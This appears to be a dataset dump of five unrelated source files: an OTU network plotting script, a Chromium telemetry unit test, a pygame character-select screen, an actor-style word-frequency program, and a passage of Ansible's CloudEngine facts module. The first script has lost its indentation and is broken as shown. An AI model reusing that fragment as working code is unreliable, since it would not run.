categ_color_map = {'Acidobacteria' : '#ff69b4','Actinobacteria' : '#ee82ee','Aquificae' : '#a020f0',\
'Armatimonadetes' : '#a52a2a','Bacteroidetes' : '#fa8072','Caldiserica' : '#cd853f','Chlamydiae' : '#ffa500',\
'Chlorobi' : '#ff0000','Chloroflexi' : '#ff6347','Chrysiogenetes' : '#0000ff','Cyanobacteria' : '#1e90ff',\
'Deferribacteres' : '#00bfff','Deinococcus-Thermus' : '#40e0d0','Dictyoglomi' : '#00ffff',\
'Elusimicrobia' : '#e0ffff','Fibrobacteres' : '#5f9ea0','Firmicutes' : '#f5fffa','Fusobacteria' : '#f0ffff',\
'Gemmatimonadetes' : '#f0f8ff','Lentisphaerae' : '#e6e6fa','Nitrospira' : '#fff0f5','Planctomycetes' : '#ffe4e1',\
'Proteobacteria' : '#66cdaa','Spirochaetes' : '#7fffd4','Synergistetes' : '#006400','Tenericutes' : '#556b2f',\
'Thermodesulfobacteria' : '#8fbc8f','Thermomicrobia' : '#9acd32','Thermotogae' : '#228b22','Verrucomicrobia' : '#6b8e23',\
'Crenarchaeota' : '#bdb76b','Euryarchaeota' : '#f0e68c','Korarchaeota' : '#ffff00','Nanoarchaeota' : '#d3d3d3',\
'Thaumarchaeota' : '#adff2f','[Parvarchaeota]' : '#faf0e6','[Caldithrix]' : '#faebd7','[Thermi]' : '#eedfcc','AD3' : '#cdc0b0','BHI80-139' : '#8b8378','BRC1' : '#ffefd5','FBP' : '#ffebcd','FCPU426' : '#ffe4c4','GAL15' : '#eed5b7','GN02' : '#cdb79e','GN04' : '#8b7d6b','GOUTA4' : '#ffdab9','Kazan-3B-28' : '#eecbad','MVP-21' : '#cdaf95','MVS-104' : '#8b7765','NC10' : '#ffdead','Nitrospirae' : '#ffe4b5','NKB19' : '#fff8dc','OD1' : '#eee8dc','OP11' : '#cdc8b1','OP3' : '#8b8878','SBR1093' : '#fffff0','SC4' : '#eee5de','SR1' : '#cdc5bf','TM6' : '#8b8682','TM7' : '#f0fff0','WPS-2' : '#e0eee0','WS2' : '#c1cdc1','WS3' : '#838b83','WS4' : '#4682b4','ZB3' : '#b0c4de','Other' : '#add8e6','UnassignedOtherOther' : '#b0e0e6'}
edge_color_map = {'0':'black', '1.000':'green' , '-1.000':'red'}
if args.edgetypeoff:
draw_plots_wout_edge_attributes(infile, node_attrib_file, outfilestring, img_qual, img_frmt, delim, attrib_color_map, categ_color_map, edge_color_map)
else:
draw_plots_with_edge_attributes(infile, node_attrib_file, outfilestring, img_qual, img_frmt, delim, attrib_color_map, categ_color_map, edge_color_map)
def get_edge_attributes(edges, edge_color_map):
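    # Color each edge by the sign of its correlation weight
    # ('1.000' -> green, '-1.000' -> red, '0' -> black).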
edges_attrib_dict = dict()
if len(edges[0]) < 3:
sys.exit('\nedge attributes file required, not sif\n')
else:
for (u,v,w) in edges:
edge = (u,v)
edges_attrib_dict[edge] = edge_color_map[w] # the value is the color based on the edge weight
#if edge_color_map[w] == 'black':
# print edge, '--->', edge_color_map[w]
return edges_attrib_dict
def draw_plots_with_edge_attributes(infile, node_attrib_file, outfilestring, img_qual, img_frmt, delim, attrib_color_map, categ_color_map, edge_color_map):
G = nx.Graph()
# edges
edges = readColumnsSep(infile, ' ', 0, 2, 4)
edges_attrib_dict = get_edge_attributes(edges, edge_color_map)
edges_list = edges_attrib_dict.keys()
Gcolors = edges_attrib_dict.values()
#G.add_edges_from(edges_list) # this will only add edges but not the color info. which I might want later
for (u,v) in edges_list:
G.add_edge(u , v, color=edges_attrib_dict[(u,v)])
# node attributes
node_module_dict = readDict(node_attrib_file, 1, 7, '\t')
for node in node_module_dict:
G.add_node(node, moduleNumb = node_module_dict[node])
#print G.edges(data=True)
# preprocessed graph, edges only if both nodes are in same module
edges_between_nodes_from_same_module = preprocess_graph(edges_list, node_module_dict)
samModG = nx.Graph()
#samModG.add_edges_from(edges_between_nodes_from_same_module)
#samModG_edges_list = []
samModGcolors = []
for (u,v) in edges_between_nodes_from_same_module:
# for singleton nodes in module, dummy self edge was added to display on plot
color_ = ''
if (u,v) in edges_attrib_dict:
color_ = edges_attrib_dict[(u,v)]
elif u==v:
color_ = 'black'
samModG.add_edge(u , v, color=color_)
#samModG_edges_list.append()
samModGcolors.append(color_)
#print samModGcolors
# identify the category the OTU belongs to
node_categ_dict = identify_node_categ(node_module_dict)
for node in samModG.nodes():
samModG.add_node(node, category = node_categ_dict[node])
# reduce length of label for easier visualization
new_labels = create_pretty_node_labels(G)
# plot edges as per modules
#http://stackoverflow.com/questions/24662006/python-networkx-graph-different-colored-nodes-using-two-lists
nodeColor = [attrib_color_map[G.node[node]['moduleNumb']] for node in G if node != 'Name']
#http://stackoverflow.com/questions/22992009/legend-in-python-networkx
# create legend
f = plt.figure(1)
ax = f.add_subplot(1,1,1)
for label in attrib_color_map:
if label in node_module_dict.values():# only show legend for values that are in my data
ax.plot([],[],'o',color=attrib_color_map[label],label=label)
for label in edge_color_map: # 0, 1, -1 correlation values
if edge_color_map[label] in Gcolors:# colors, only show legend for values that are in my data
ax.plot([],[],color=edge_color_map[label],label=label)
########### to do ######### calculate relative abundance of the node and make a list and submit as node_size to draw()
plt.title('OTUs colored as per modules. Intermodule edges allowed.')
nx.draw(G, edgelist=edges_list, edge_color = Gcolors, node_color = nodeColor, with_labels = False)#, style='dashed')
#nx.draw_circular(G, node_color = nodeColor, labels = new_labels, with_labels = True)
#plt.legend()
plt.legend(bbox_to_anchor=(0.05, 0.93), loc=0, borderaxespad=0.,prop={'size':6}) #, title = "Legend"
plt.savefig(outfilestring + "-all-edge-node-color-module.png", dpi = img_qual)
plt.clf()
# nodecolor as per the phyla
nodeColor = [categ_color_map[samModG.node[node]['category']] for node in samModG]
new_labels = create_pretty_node_labels(samModG)
# create legend
f = plt.figure(1)
ax = f.add_subplot(1,1,1)
for label in categ_color_map:
if label in node_categ_dict.values():# only show legend for values that are in my data
ax.plot([],[],'o',color=categ_color_map[label],label=label)
for label in edge_color_map: # 0, 1, -1 correlation values
if edge_color_map[label] in samModGcolors:# colors, only show legend for values that are in my data
ax.plot([],[],color=edge_color_map[label],label=label)
plt.title('OTUs colored as per Phylum. Intermodule edges NOT allowed.')
# other layout algos: dot, neato, fdp, twopi, circo
algo = 'circo'
pos = nx.graphviz_layout(samModG, prog=algo)
nx.draw(samModG, edgelist=edges_between_nodes_from_same_module, edge_color = samModGcolors, pos=pos, node_color = nodeColor, labels = new_labels, with_labels = True)
#http://stackoverflow.com/questions/7125009/how-to-change-legend-size-with-matplotlib-pyplot
#http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.legend
#plt.legend(loc=3,prop={'size':6})
plt.legend(bbox_to_anchor=(0.15, 0.93), loc=0, borderaxespad=0.,prop={'size':6}) #, title = "Legend"
plt.savefig(outfilestring + "-same-module-edge-node-color-phyla." + img_frmt, dpi = img_qual)
plt.close()
def draw_plots_wout_edge_attributes(infile, node_attrib_file, outfilestring, img_qual, img_frmt, delim, attrib_color_map, categ_color_map,edge_color_map):
G = nx.Graph()
# edges
edges = readColumnsSep(infile, '\t', 0, 2)
G.add_edges_from(edges)
# node attributes
node_module_dict = readDict(node_attrib_file, 1, 7, '\t')
for node in node_module_dict:
G.add_node(node, moduleNumb = node_module_dict[node])
# preprocessed graph, edges only if both nodes are in same module
edges_between_nodes_from_same_module = preprocess_graph(edges, node_module_dict)
samModG = nx.Graph()
samModG.add_edges_from(edges_between_nodes_from_same_module)
# identify the category the OTU belongs to
node_categ_dict = identify_node_categ(node_module_dict)
for node in samModG.nodes():
samModG.add_node(node, category = node_categ_dict[node])
# reduce length of label for easier visualization
new_labels = create_pretty_node_labels(G)
# plot edges as per modules
#http://stackoverflow.com/questions/24662006/python-networkx-graph-different-colored-nodes-using-two-lists
nodeColor = [attrib_color_map[G.node[node]['moduleNumb']] for node in G if node != 'Name']
#http://stackoverflow.com/questions/22992009/legend-in-python-networkx
# create legend
f = plt.figure(1)
ax = f.add_subplot(1,1,1)
for label in attrib_color_map:
if label in node_module_dict.values():# only show legend for values that are in my data
ax.plot([0],[0],color=attrib_color_map[label],label=label)
plt.title('OTUs colored as per modules. Intermodule edges allowed.')
nx.draw(G, node_color = nodeColor, with_labels = False)
#nx.draw_circular(G, node_color = nodeColor, labels = new_labels, with_labels = True)
#plt.legend()
plt.legend(bbox_to_anchor=(0.05, 0.93), loc=0, borderaxespad=0.,prop={'size':6}) #, title = "Legend"
plt.savefig(outfilestring + "-all-edge-node-color-module.png", dpi = img_qual)
plt.clf()
# nodecolor as per the phyla
nodeColor = [categ_color_map[samModG.node[node]['category']] for node in samModG]
new_labels = create_pretty_node_labels(samModG)
# create legend
f = plt.figure(1)
ax = f.add_subplot(1,1,1)
for label in categ_color_map:
if label in node_categ_dict.values():# only show legend for values that are in my data
ax.plot([0],[0],color=categ_color_map[label],label=label)
plt.title('OTUs colored as per Phylum. Intermodule edges NOT allowed.')
# other layout algos: dot, neato, fdp, twopi, circo
algo = 'circo'
pos = nx.graphviz_layout(samModG, prog=algo)
nx.draw(samModG, pos=pos, node_color = nodeColor, labels = new_labels, with_labels = True)
#http://stackoverflow.com/questions/7125009/how-to-change-legend-size-with-matplotlib-pyplot
#http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.legend
#plt.legend(loc=3,prop={'size':6})
plt.legend(bbox_to_anchor=(0.15, 0.93), loc=0, borderaxespad=0.,prop={'size':6}) #, title = "Legend"
plt.savefig(outfilestring + "-same-module-edge-node-color-phyla." + img_frmt, dpi = img_qual)
plt.close()
if __name__=='__main__':
datetime = strftime("%a, %d %b %Y %I:%M:%S %p", localtime())
cmd = 'echo ' + datetime
os.system(cmd)
main(sys.argv)
| gpl-3.0 | 4,652,235,010,529,054,000 | 50.3 | 727 | 0.661385 | false |
hefen1/chromium | tools/telemetry/telemetry/web_perf/metrics/layout_unittest.py | 12 | 1062 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry.results import page_test_results
from telemetry.page import page
from telemetry.web_perf.metrics import layout
from collections import namedtuple
FakeEvent = namedtuple('Event', 'name, start, end')
class LayoutMetricUnitTest(unittest.TestCase):
def testAvgStddev(self):
results = page_test_results.PageTestResults()
results.WillRunPage(page.Page('file://blank.html'))
events = map(FakeEvent._make, [(name, 42, 43) for name in
layout.LayoutMetric.EVENTS])
layout.LayoutMetric()._AddResults(events, results)
expected = set()
for name in layout.LayoutMetric.EVENTS.itervalues():
expected.add((name + '_avg', 1))
expected.add((name + '_stddev', 0))
actual = set((value.name, value.value) for value in
results.current_page_run.values)
self.assertEquals(expected, actual)
| bsd-3-clause | 7,360,149,525,825,876,000 | 36.928571 | 72 | 0.700565 | false |
sylvanelite/universalSmashSystem | menu/css.py | 2 | 12608 | import settingsManager
import spriteManager
import os
import imp
import pygame
import battle
import sys
import stages.true_arena as stage
import engine.cpuPlayer as cpuPlayer
import engine.abstractFighter as abstractFighter
import sss
import musicManager
class CSSScreen():
def __init__(self,_rules=None):
settings = settingsManager.getSetting().setting
self.rules = _rules
self.height = settings['windowHeight']
self.width = settings['windowWidth']
pygame.init()
screen = pygame.display.get_surface()
background = pygame.Surface(screen.get_size())
background = background.convert()
clock = pygame.time.Clock()
self.player_controls = []
self.player_panels = []
for i in range(0,4):
self.player_controls.append(settingsManager.getControls(i))
self.player_panels.append(PlayerPanel(i))
self.player_controls[i].linkObject(self.player_panels[i]) #So playerPanel will take the inputs
self.player_controls[i].flushInputs()
status = 0
musicManager.getMusicManager().stopMusic(100)
while status == 0:
music = musicManager.getMusicManager()
music.doMusicEvent()
if not musicManager.getMusicManager().isPlaying():
musicManager.getMusicManager().rollMusic('css')
#Start event loop
for bindings in self.player_controls:
bindings.passInputs()
for event in pygame.event.get():
for bindings in self.player_controls:
k = bindings.getInputs(event)
if k == 'attack':
if self.checkForSelections():
sss.StageScreen(self.rules,self.getFightersFromPanels())
for panel in self.player_panels:
panel.active_object = panel.wheel
panel.chosen_fighter = None
panel.bg_surface = None
for i in range(0,4):
self.player_controls[i].linkObject(self.player_panels[i]) #So playerPanel will take the inputs
self.player_controls[i].flushInputs()
if event.type == pygame.QUIT:
status = -1
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
status = 1
#End event loop
screen.fill((128, 128, 128))
for panel in self.player_panels:
panel.update()
panel.draw(screen)
pygame.display.flip()
clock.tick(60)
def checkForSelections(self):
for panel in self.player_panels:
if panel.active and panel.chosen_fighter == None:
return False
if not any([x.active for x in self.player_panels]):
return False
return True
def getFightersFromPanels(self):
fighter_list = []
for panel in self.player_panels:
if panel.active:
fighter_list.append(panel.chosen_fighter)
return fighter_list
class CSSWidget():
def __init__(self,_panel,_displayList,_choicesList):
self.previous_widget = None
self.next_widget = None
self.panel = _panel
self.choices = []
for i,key in _displayList:
self.choices.append((key,_choicesList[i]))
def onConfirm(self):
pass
def draw(self):
pass
class FighterWheel():
def __init__(self,_playerNum):
self.fighters = []
# Load all files.
directory = settingsManager.createPath("fighters")
fighter_count = 0
for subdir in next(os.walk(directory))[1]:
if(subdir == '__pycache__'):
continue
fighter_py = settingsManager.importFromURI(directory, os.path.join(directory,subdir,"fighter.py"),_suffix=str(fighter_count))
#try:
if fighter_py:
fighter = fighter_py.getFighter(os.path.join(directory,subdir),_playerNum)
else:
fighter = abstractFighter.AbstractFighter(os.path.join(directory,subdir),_playerNum)
if (fighter == None):
print("No fighter found at " + os.path.join(directory,subdir,"fighter.py"))
else:
fighter_count += 1
self.fighters.append(fighter)
self.current_index = 0
self.current_fighter = self.fighters[0]
self.wheel_size = 9
self.visible_sprites = [None for _ in range(self.wheel_size)]
self.animateWheel()
self.wheel_shadow = spriteManager.ImageSprite(settingsManager.createPath(os.path.join("sprites","cssbar_shadow.png")))
self.fill_color='#000000'
def setFillColor(self,_color):
self.wheel_shadow.recolor(self.wheel_shadow.image,
pygame.Color(self.fill_color),
pygame.Color(_color))
self.fill_color = _color
def changeSelected(self,_increment):
self.current_index = self.current_index + _increment
self.current_fighter = self.fighters[self.current_index % len(self.fighters)]
self.animateWheel()
def fighterAt(self,_offset):
return self.fighters[(self.current_index + _offset) % len(self.fighters)]
def animateWheel(self):
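        # Rebuild the visible icon strip: the selected fighter sits at slot 0 and its
        # neighbors alternate to the right (+i) and left (-i); every icon except the
        # current selection is drawn semi-transparent.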
self.visible_sprites[0] = self.fighterAt(0).css_icon
for i in range(1,(self.wheel_size//2)+1):
self.visible_sprites[2*i-1] = self.fighterAt(i).css_icon
self.visible_sprites[2*i] = self.fighterAt(-1 * i).css_icon
[spriteManager.ImageSprite.alpha(sprite, 128) for sprite in self.visible_sprites]
self.visible_sprites[0].alpha(255)
def draw(self, _screen, _location):
center = 112
blank_image = pygame.Surface([256,32], pygame.SRCALPHA, 32).convert_alpha()
blank_image.blit(self.visible_sprites[0].image, [center,0])
for i in range(1,(self.wheel_size//2)+1):
blank_image.blit(self.visible_sprites[2*i-1].image, [center + (32*i),0])
blank_image.blit(self.visible_sprites[2*i].image, [center - (32*i),0])
blank_image.blit(self.wheel_shadow.image,[0,0])
_screen.blit(blank_image, _location)
class PlayerPanel(pygame.Surface):
def __init__(self,_playerNum):
pygame.Surface.__init__(self,(settingsManager.getSetting('windowWidth')//2,
settingsManager.getSetting('windowHeight')//2))
self.keys = settingsManager.getControls(_playerNum)
self.player_num = _playerNum
self.wheel = FighterWheel(_playerNum)
self.active = False
self.ready = False
self.active_object = self.wheel
self.chosen_fighter = None
self.myBots = []
self.wheel_increment = 0
self.hold_time = 0
self.hold_distance = 0
self.wheel_offset = [(self.get_width() - 256) // 2,
(self.get_height() - 32)]
self.bg_surface = None
self.current_color = _playerNum
self.current_costume = 0
self.icon = spriteManager.ImageSprite(settingsManager.createPath('sprites/default_franchise_icon.png'))
self.icon.rect.center = self.get_rect().center
self.icon_color = pygame.Color('#cccccc')
self.fill_color = '#000000'
self.wheel.setFillColor(self.fill_color)
self.recolorIcon()
def update(self):
if self.wheel_increment != 0:
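            # Holding left/right scrolls the wheel with an accelerating key-repeat:
            # the delay between steps shrinks from 30 to 20 to 10 frames.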
if self.hold_time > self.hold_distance:
if self.hold_distance == 0:
self.hold_distance = 30
elif self.hold_distance == 30:
self.hold_distance = 20
elif self.hold_distance == 20:
self.hold_distance = 10
settingsManager.getSfx().playSound('selectL')
self.wheel.changeSelected(self.wheel_increment)
self.current_color = self.player_num
self.recolorIcon(True)
self.icon = self.wheel.fighterAt(0).franchise_icon
self.icon.rect.center = self.get_rect().center
self.recolorIcon()
self.hold_time = 0
else:
self.hold_time += 1
if self.bg_surface and self.bg_surface.get_alpha() > 128:
self.bg_surface.set_alpha(self.bg_surface.get_alpha() - 10)
def keyPressed(self,_key):
if _key != 'special' and self.active == False:
self.active = True
return
if _key == 'special' and self.active == True:
if len(self.myBots) > 0:
pass #will disable bots
elif self.active_object == self.wheel:
self.active = False
return
else:
self.active_object = self.wheel
self.chosen_fighter = None
self.bg_surface = None
return
#TODO: Add more sound effects and shutter sprite
if _key == 'left':
if self.active_object == self.wheel:
self.wheel_increment = -1
elif _key == 'right':
if self.active_object == self.wheel:
self.wheel_increment = 1
elif _key == 'attack':
if self.active_object == self.wheel:
self.bg_surface = self.copy()
self.bg_surface.set_alpha(240)
self.recolorIcon(True)
self.recolorIcon()
self.active_object = None
self.chosen_fighter = self.wheel.fighterAt(0)
self.chosen_fighter.current_color = self.current_color
self.chosen_fighter.current_costume = self.current_costume
elif _key == 'jump':
self.current_color += 1
self.recolorIcon()
elif _key == 'shield':
self.current_costume += 1
def keyReleased(self,_key):
if _key == 'right' or _key == 'left':
self.wheel_increment = 0
self.hold_distance = 0
self.hold_time = 0
def draw(self,_screen):
if self.active:
self.fill(pygame.Color(self.fill_color))
if self.bg_surface:
self.blit(self.bg_surface,[0,0])
else:
self.wheel.draw(self,self.wheel_offset)
self.icon.draw(self, self.icon.rect.topleft,1.0)
else:
self.fill(pygame.Color(settingsManager.getSetting('playerColor' + str(self.player_num))))
#draw closed shutter
offset = [0,0]
if self.player_num == 1 or self.player_num == 3: offset[0] = self.get_width()
if self.player_num == 2 or self.player_num == 3: offset[1] = self.get_height()
_screen.blit(self,offset)
def recolorIcon(self,_reset=False):
if _reset:
self.icon.recolor(self.icon.image,
self.icon_color,
pygame.Color('#cccccc'))
self.icon_color = pygame.Color('#cccccc')
else:
display_color = self.wheel.fighterAt(0).palette_display
new_color = display_color[self.current_color % len(display_color)]
#If the icon matches the background, make it default to the icon color
if new_color == pygame.Color(self.fill_color):
new_color = pygame.Color('#cccccc')
self.icon.recolor(self.icon.image,
self.icon_color,
new_color)
self.icon_color = new_color | gpl-3.0 | 9,053,441,308,917,273,000 | 38.546624 | 137 | 0.523477 | false |
wolfhesse/exercises-in-programming-style | 28-actors/tf-28.py | 17 | 4126 | #!/usr/bin/env python
import sys, re, operator, string
from threading import Thread
from Queue import Queue
class ActiveWFObject(Thread):
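    # Base class for the active objects ("actors"): each instance runs in its own
    # thread, pulling messages off its queue and dispatching them until a 'die'
    # message arrives.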
def __init__(self):
Thread.__init__(self)
self.name = str(type(self))
self.queue = Queue()
self._stop = False
self.start()
def run(self):
while not self._stop:
message = self.queue.get()
self._dispatch(message)
if message[0] == 'die':
self._stop = True
def send(receiver, message):
receiver.queue.put(message)
class DataStorageManager(ActiveWFObject):
""" Models the contents of the file """
_data = ''
def _dispatch(self, message):
if message[0] == 'init':
self._init(message[1:])
elif message[0] == 'send_word_freqs':
self._process_words(message[1:])
else:
# forward
send(self._stop_word_manager, message)
def _init(self, message):
path_to_file = message[0]
self._stop_word_manager = message[1]
with open(path_to_file) as f:
self._data = f.read()
pattern = re.compile('[\W_]+')
self._data = pattern.sub(' ', self._data).lower()
def _process_words(self, message):
recipient = message[0]
data_str = ''.join(self._data)
words = data_str.split()
for w in words:
send(self._stop_word_manager, ['filter', w])
send(self._stop_word_manager, ['top25', recipient])
class StopWordManager(ActiveWFObject):
""" Models the stop word filter """
_stop_words = []
def _dispatch(self, message):
if message[0] == 'init':
self._init(message[1:])
elif message[0] == 'filter':
return self._filter(message[1:])
else:
# forward
send(self._word_freqs_manager, message)
def _init(self, message):
with open('../stop_words.txt') as f:
self._stop_words = f.read().split(',')
self._stop_words.extend(list(string.ascii_lowercase))
self._word_freqs_manager = message[0]
def _filter(self, message):
word = message[0]
if word not in self._stop_words:
send(self._word_freqs_manager, ['word', word])
class WordFrequencyManager(ActiveWFObject):
""" Keeps the word frequency data """
_word_freqs = {}
def _dispatch(self, message):
if message[0] == 'word':
self._increment_count(message[1:])
elif message[0] == 'top25':
self._top25(message[1:])
def _increment_count(self, message):
word = message[0]
if word in self._word_freqs:
self._word_freqs[word] += 1
else:
self._word_freqs[word] = 1
def _top25(self, message):
recipient = message[0]
freqs_sorted = sorted(self._word_freqs.iteritems(), key=operator.itemgetter(1), reverse=True)
send(recipient, ['top25', freqs_sorted])
class WordFrequencyController(ActiveWFObject):
def _dispatch(self, message):
if message[0] == 'run':
self._run(message[1:])
elif message[0] == 'top25':
self._display(message[1:])
else:
raise Exception("Message not understood " + message[0])
def _run(self, message):
self._storage_manager = message[0]
send(self._storage_manager, ['send_word_freqs', self])
def _display(self, message):
word_freqs = message[0]
for (w, f) in word_freqs[0:25]:
print w, ' - ', f
send(self._storage_manager, ['die'])
self._stop = True
#
# The main function
#
word_freq_manager = WordFrequencyManager()
stop_word_manager = StopWordManager()
send(stop_word_manager, ['init', word_freq_manager])
storage_manager = DataStorageManager()
send(storage_manager, ['init', sys.argv[1], stop_word_manager])
wfcontroller = WordFrequencyController()
send(wfcontroller, ['run', storage_manager])
# Wait for the active objects to finish
[t.join() for t in [word_freq_manager, stop_word_manager, storage_manager, wfcontroller]]
| mit | 524,502,154,708,970,500 | 29.338235 | 101 | 0.578042 | false |
Dhivyap/ansible | lib/ansible/modules/network/cloudengine/ce_facts.py | 11 | 11503 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: ce_facts
version_added: "2.4"
author: "wangdezhuang (@QijunPan)"
short_description: Gets facts about HUAWEI CloudEngine switches.
description:
- Collects facts from CloudEngine devices running the CloudEngine
operating system. Fact collection is supported over Cli
transport. This module prepends all of the base network fact keys
with C(ansible_net_<fact>). The facts module will always collect a
base set of facts from the device and can enable or disable
collection of additional facts.
options:
gather_subset:
description:
- When supplied, this argument will restrict the facts collected
to a given subset. Possible values for this argument include
all, hardware, config, and interfaces. Can specify a
list of values to include a larger subset. Values can also be used
with an initial C(M(!)) to specify that a specific subset should
not be collected.
required: false
default: '!config'
"""
EXAMPLES = """
# Note: examples below use the following provider dict to handle
# transport and authentication to the node.
- name: CloudEngine facts test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Gather_subset is all"
ce_facts:
gather_subset: all
provider: "{{ cli }}"
- name: "Collect only the config facts"
ce_facts:
gather_subset: config
provider: "{{ cli }}"
- name: "Do not collect hardware facts"
ce_facts:
gather_subset: "!hardware"
provider: "{{ cli }}"
"""
RETURN = """
gather_subset:
description: The list of fact subsets collected from the device
returned: always
type: list
# default
BIOS Version:
description: The BIOS version running on the remote device
returned: always
type: str
Board Type:
description: The board type of the remote device
returned: always
type: str
CPLD1 Version:
description: The CPLD1 Version running the remote device
returned: always
type: str
CPLD2 Version:
description: The CPLD2 Version running the remote device
returned: always
type: str
MAB Version:
description: The MAB Version running the remote device
returned: always
type: str
PCB Version:
description: The PCB Version running the remote device
returned: always
type: str
hostname:
description: The hostname of the remote device
returned: always
type: str
# hardware
FAN:
description: The fan state on the device
returned: when hardware is configured
type: str
PWR:
description: The power state on the device
returned: when hardware is configured
type: str
filesystems:
description: The filesystems on the device
returned: when hardware is configured
type: str
flash_free:
description: The flash free space on the device
returned: when hardware is configured
type: str
flash_total:
description: The flash total space on the device
returned: when hardware is configured
type: str
memory_free:
description: The memory free space on the remote device
returned: when hardware is configured
type: str
memory_total:
description: The memory total space on the remote device
returned: when hardware is configured
type: str
# config
config:
description: The current system configuration on the device
returned: when config is configured
type: str
# interfaces
all_ipv4_addresses:
description: All IPv4 addresses configured on the device
returned: when interfaces is configured
type: list
interfaces:
description: A hash of all interfaces running on the system
returned: when interfaces is configured
type: dict
neighbors:
description: The list of LLDP neighbors from the remote device
returned: when interfaces is configured
type: dict
"""
import re
from ansible.module_utils.network.cloudengine.ce import run_commands
from ansible.module_utils.network.cloudengine.ce import ce_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import iteritems
class FactsBase(object):
COMMANDS = frozenset()
def __init__(self, module):
self.module = module
self.facts = dict()
self.responses = None
def populate(self):
self.responses = run_commands(self.module, list(self.COMMANDS))
class Default(FactsBase):
""" Class default """
COMMANDS = [
'display version',
'display current-configuration | include sysname'
]
def populate(self):
""" Populate method """
super(Default, self).populate()
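        # self.responses holds the output of COMMANDS in order:
        # [0] 'display version', [1] 'display current-configuration | include sysname'.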
data = self.responses[0]
if data:
version = data.split("\n")
for item in version:
if re.findall(r"^\d+\S\s+", item.strip()):
tmp_item = item.split()
tmp_key = tmp_item[1] + " " + tmp_item[2]
if len(tmp_item) > 5:
self.facts[tmp_key] = " ".join(tmp_item[4:])
else:
self.facts[tmp_key] = tmp_item[4]
data = self.responses[1]
if data:
tmp_value = re.findall(r'sysname (.*)', data)
self.facts['hostname'] = tmp_value[0]
class Config(FactsBase):
""" Class config """
COMMANDS = [
'display current-configuration configuration system'
]
def populate(self):
""" Populate method """
super(Config, self).populate()
data = self.responses[0]
if data:
self.facts['config'] = data.split("\n")
class Hardware(FactsBase):
""" Class hardware """
COMMANDS = [
'dir',
'display memory',
'display device'
]
def populate(self):
""" Populate method """
super(Hardware, self).populate()
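        # self.responses holds the output of COMMANDS in order:
        # [0] 'dir', [1] 'display memory', [2] 'display device'.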
data = self.responses[0]
if data:
self.facts['filesystems'] = re.findall(r'^Directory of (.*)/', data)[0]
self.facts['flash_total'] = re.findall(r'(.*) total', data)[0].replace(",", "")
self.facts['flash_free'] = re.findall(r'total \((.*) free\)', data)[0].replace(",", "")
data = self.responses[1]
if data:
memory_total = re.findall(r'Total Memory Used: (.*) Kbytes', data)[0]
use_percent = re.findall(r'Memory Using Percentage: (.*)%', data)[0]
memory_free = str(int(memory_total) - int(memory_total) * int(use_percent) / 100)
self.facts['memory_total'] = memory_total + " Kb"
self.facts['memory_free'] = memory_free + " Kb"
data = self.responses[2]
if data:
device_info = data.split("\n")
tmp_device_info = device_info[4:-1]
for item in tmp_device_info:
tmp_item = item.split()
if len(tmp_item) == 8:
self.facts[tmp_item[2]] = tmp_item[6]
elif len(tmp_item) == 7:
self.facts[tmp_item[0]] = tmp_item[5]
class Interfaces(FactsBase):
""" Class interfaces """
COMMANDS = [
'display interface brief',
'display ip interface brief',
'display lldp neighbor brief'
]
def populate(self):
""" Populate method"""
interface_dict = dict()
ipv4_addr_dict = dict()
neighbors_dict = dict()
super(Interfaces, self).populate()
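        # self.responses holds the output of COMMANDS in order:
        # [0] 'display interface brief', [1] 'display ip interface brief',
        # [2] 'display lldp neighbor brief'.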
data = self.responses[0]
begin = False
if data:
interface_info = data.split("\n")
for item in interface_info:
if begin:
tmp_item = item.split()
interface_dict[tmp_item[0]] = tmp_item[1]
if re.findall(r"^Interface", item.strip()):
begin = True
self.facts['interfaces'] = interface_dict
data = self.responses[1]
if data:
ipv4_addr = data.split("\n")
tmp_ipv4 = ipv4_addr[11:]
for item in tmp_ipv4:
tmp_item = item.split()
ipv4_addr_dict[tmp_item[0]] = tmp_item[1]
self.facts['all_ipv4_addresses'] = ipv4_addr_dict
data = self.responses[2]
if data:
neighbors = data.split("\n")
tmp_neighbors = neighbors[2:]
for item in tmp_neighbors:
tmp_item = item.split()
if len(tmp_item) > 3:
neighbors_dict[tmp_item[0]] = tmp_item[3]
else:
neighbors_dict[tmp_item[0]] = None
self.facts['neighbors'] = neighbors_dict
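# Map each gather_subset name to the FactsBase subclass that collects it.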
FACT_SUBSETS = dict(
default=Default,
hardware=Hardware,
interfaces=Interfaces,
config=Config,
)
VALID_SUBSETS = frozenset(FACT_SUBSETS.keys())
def main():
""" Module main """
spec = dict(
gather_subset=dict(default=['!config'], type='list')
)
spec.update(ce_argument_spec)
module = AnsibleModule(argument_spec=spec, supports_check_mode=True)
warnings = list()
check_args(module, warnings)
gather_subset = module.params['gather_subset']
runable_subsets = set()
exclude_subsets = set()
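    # Resolve the requested subsets: 'all' expands to every valid subset, and
    # a leading '!' marks a subset for exclusion instead of collection.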
for subset in gather_subset:
if subset == 'all':
runable_subsets.update(VALID_SUBSETS)
continue
if subset.startswith('!'):
subset = subset[1:]
if subset == 'all':
exclude_subsets.update(VALID_SUBSETS)
continue
exclude = True
else:
exclude = False
if subset not in VALID_SUBSETS:
module.fail_json(msg='Bad subset')
if exclude:
exclude_subsets.add(subset)
else:
runable_subsets.add(subset)
if not runable_subsets:
runable_subsets.update(VALID_SUBSETS)
runable_subsets.difference_update(exclude_subsets)
runable_subsets.add('default')
facts = dict()
